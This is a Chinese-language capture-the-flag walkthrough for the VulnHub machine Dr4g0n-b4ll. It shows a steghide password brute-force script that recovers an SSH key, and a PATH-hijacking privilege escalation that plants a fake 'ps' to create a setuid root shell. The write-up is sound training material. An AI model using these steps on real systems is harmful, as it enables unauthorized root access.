vulnhub:Dr4g0n-b4ll靶机

kali:192.168.111.111

靶机:192.168.111.149

信息收集

端口扫描

目录爆破

查看index.html源码发现一段字符串

base64解密

查看robots.txt发现一段密文:eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=，base64解密

访问/DRAGON BALL/该目录

发现一个网页

点击download发现是张图片，猜测是图片隐写

爆破密码

#!/usr/bin/python3

import os

with open('/usr/share/wordlists/rockyou.txt', encoding='utf-8', mode='r') as f1:
    for i in f1:
        i = i.strip()
        a = os.system(f'steghide extract -sf aj.jpg -p {i}')
        if a != 256:
            print(f'密码：{i}')
            break

密码是:love，爆破出文件id_rsa，结合之前发现的xmen用户登录ssh

chmod 400 id_rsa
ssh xmen@192.168.111.149 -i id_rsa

提权

查找具有suid权限的文件

发现/home/xmen/script/shell同时会执行ps命令

修改环境变量提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/ps
chmod 777 /tmp/ps
export PATH=/tmp:$PATH
/home/xmen/script/shell
/tmp/bash -p

获得flag